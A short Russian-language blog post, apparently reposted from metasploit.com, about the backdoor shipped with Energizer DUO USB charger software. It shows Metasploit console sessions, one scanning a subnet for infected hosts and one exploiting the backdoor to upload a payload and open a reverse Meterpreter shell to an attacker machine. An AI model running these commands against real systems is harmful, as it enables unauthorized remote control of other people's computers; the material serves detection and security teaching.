dimanche 21 février 2010

Energizer троян

Newsophere недавно гудело о том, что в Energizer's "DUO" USB Battery Charger включен вредоносный Backdoor в сопутствующем программном обеспечении. Бэкдор был обнаружен только после того как продукт был снят с линии, что привело некоторых к мысли, что троян прошел через весь жизненный цикл незамеченным. Хорошей новостью является то, что бэкдор сравнительно безвреден; если на машине стоит фаервол, то он должен препятствовать доступу к прослушке порта 7777. Backdoor не создает исходящие соединения и удаление программного обеспечения USB Charger software package очищает систему.

Теперь вы можете использовать Metasploit чтобы обнаружить зараженные системы в сети. После скачивания копии Metasploit и обновление до версии 8749 или выше, следующие команды могут использоваться для сканирования сети:
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BA

Для того, чтобы пойти еще дальше, получить доступ к системе и запустить этот бэкдор, используйте energizer_duo_payload модуль:
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)

meterpreter > getuid
Server username: XPDEV\Developer

extrait de metasploit.com

Aucun commentaire:

Enregistrer un commentaire